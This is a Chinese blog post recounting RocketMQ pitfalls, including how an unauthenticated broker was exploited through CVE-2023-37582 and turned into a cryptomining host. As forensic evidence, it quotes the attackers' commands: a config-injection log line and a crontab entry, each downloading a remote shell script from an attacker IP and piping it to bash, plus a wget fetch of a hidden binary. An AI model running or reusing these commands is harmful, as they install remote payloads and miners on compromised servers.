当前位置: 首页 > news >正文

Rocketmq的坑又来了

最好是同样的consumer有相同的消费tag

第一点就是常见的,consumer的tag,同一个consumer的group是会进行覆盖的,后面的consumer是会覆盖前面的,所以最好是同样的consumer有相同的消费tag。

Rocketmq 4.9.6以下有个漏洞,CVE-2023-37582,漏洞编号。

可以看到这个漏洞,如果mq有鉴权是不会触发的。但是mq坑的地方在于,如果启动的时候没有传入-c参数,他不会读取一个默认的配置文件,我猜测可能是读取的代码中默认配置。

有一次服务器异常,我启动mq的时候忘记加-c参数,导致mq没有密码暴露在互联网上了,就被人使用了这个漏洞,攻破了服务器,然后在我的服务器上跑挖矿的代码。

后来发现CPU使用异常,把挖矿的程序给停了。也不知道被人留后门没。

1、wget --no-check-certificate https://junmxiao.xyz/h5/java -O /tmp/.local/.-/java rocketmq 莫名有了这个

2、kdevtmpfsi 挖矿程序

3、攻破日志:
broker.log:2024-05-09 15:18:59 INFO AdminBrokerThread_16 - updateBrokerConfig, new config: [{filterServerNums=1, rocketmqHome=-c $@|sh . echo (curl -s 78.153.140.96/rm.sh||wget -q -O- 78.153.140.96/rm.sh)|bash;}] client: /78.153.140.30:49800

4、定时任务
crontab -l

          • wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

相关文章:

  • 全网最全 Kimi 使用手册,看完 Kimi 效率提升 80%
  • 持续总结中!2024年面试必问 20 道设计模式面试题(三)
  • 我用chatgpt写了一款程序
  • 算法训练营day51
  • git pull的使用方法
  • 程序性能优化——接口性能优化总结和思考
  • HTML 颜色名
  • 为什么选择Python作为AI开发语言
  • Anvil Empires/铁砧帝国操作没反应、频繁掉线怎么办?
  • Python第二语言(十二、SQL入门和实战)
  • PHP 命名空间
  • C++迈向精通:当我尝试修改虚函数表
  • 编程C语言自学书:引领你深入编程世界的神秘之旅
  • MDPO:Conditional Preference Optimization for Multimodal Large Language Models
  • 【STM32】GPIO简介
  • 基于文本挖掘的卡塔尔世界杯赛事网络舆情演变与趋势预测
  • Eigne库安装及使用教程
  • FastAdmin后台开发框架 lang 任意文件读取漏洞复现
  • ListModel 是 Qt Quick 中用于存储数据模型的元素,通常用于在视图组件(如 ListView、GridView)中显示数据
  • 2. 音视频H264
  • 五粮液董事长:茅台1935已脱离千元价位带,五粮液在千元价位已逐步摆脱其他竞品纠缠
  • 14岁女生瞒报年龄文身后洗不掉,法院判店铺承担六成责任
  • 一周文化讲座|城市移民与数字时代的新工作
  • 读图|展现城市品格,上海城市影像走进南美
  • 上海:下调个人住房公积金贷款利率
  • 吴清:基金业绩差的必须少收管理费,督促基金公司从“重规模”向“重回报”转变